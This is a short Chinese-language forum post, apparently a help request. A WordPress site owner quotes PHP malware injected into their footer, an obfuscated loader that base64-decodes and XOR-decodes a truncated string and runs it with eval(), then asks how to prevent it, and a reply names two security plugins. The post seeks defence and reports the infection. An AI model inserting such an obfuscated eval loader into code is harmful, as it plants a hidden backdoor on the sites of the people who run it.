我的WordPress安装遭到攻击,黑客将php代码注入我的页脚。
这是代码:
<?php /* 5pJQhrPh3XJCUOiaQCa6 */ ?><?php
$encoded = "ch0KCh...";
$raw = base64_decode($encoded);
$res = '';
for ($i = 0; $i < strlen($raw); $i++) {
$res .= chr(ord($raw[$i]) ^ ord('x'));
}
eval($res)
?>
<?php /* uqjsQSyWVhmOHAEVa1i6 */ ?>
我想知道防止这种注射的解决方案吗?我正在运行最新版本的wordpress。
插件,
有助于被黑客入侵的Wordpres网站
- 忍者扫描仪:检查文件的完整性
- iThems安全性 :有一个"暴力保护"选项